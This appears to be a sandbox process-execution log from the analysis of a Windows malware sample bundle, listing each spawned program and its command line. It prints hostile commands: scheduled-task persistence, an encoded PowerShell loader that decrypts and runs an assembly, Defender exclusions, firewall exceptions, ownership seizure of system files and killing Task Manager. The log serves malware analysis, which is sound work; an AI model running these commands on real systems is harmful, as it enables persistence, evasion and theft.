C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\PING.EXE

ping mrbeast.codes -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy Google.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy Rover.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy spinner.gif C:\Users\Admin\Desktop

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K bloatware.cmd

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe

regmess.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe

1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_091a4519-6c19-48cd-b05f-a90fb69c0301\regmess.bat" "

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe

3.exe

C:\Windows\SysWOW64\reg.exe

reg import Setup.reg /reg:32

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\reg.exe

reg import Console.reg /reg:32

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K SilentSetup.cmd

C:\Windows\SysWOW64\reg.exe

reg import Desktop.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import International.reg /reg:32

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe

WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10396,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT

C:\Windows\SysWOW64\reg.exe

reg import Fonts.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Cursors.reg /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5736 -ip 5736

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1784

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\0378038449fa4d9682e5b8e5c711d22a /t 6204 /p 6200

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe

scary.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe

the.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll

wimloader.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_582d51cd-8c29-4269-841f-5d7e9d03a993\caller.cmd" "

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hTlYQIUO0h1A.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe

ac3.exe

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\shell1.ps1"

C:\Windows\SysWOW64\PING.EXE

ping trustsentry.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\PING.EXE

ping ya.ru -t -n 1 -s 4 -4

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZQihT05n9bv.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\PING.EXE

ping tria.ge -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy bloatware C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy beastify.url C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy shell1.ps1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\explorer.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\explorer.exe /grant Admin:(F)

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\System32\dwm.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\System32\dwm.exe /grant Admin:(F)

C:\Windows\SysWOW64\xcopy.exe

xcopy xcer.cer C:\Users\Admin\Desktop

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe

freebobux.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe

SolaraBootstraper.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im ctfmon.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll

wim.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\freebobux.bat""

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\load.cmd" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HncuP1qJTS5v.bat" "

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe

clwcp c:\temp\bg.bmp

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\cringe.mp4"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\lol.ini

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web2.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\xcer.cer

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\x.vbs"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWt94Dub5LFs.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmMfjD5k7eK.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe

f3cb220f1aaa32ca310586e5f62dcab1.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14909979360840004400,3372282537268262913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Windows\SYSTEM32\schtasks.exe

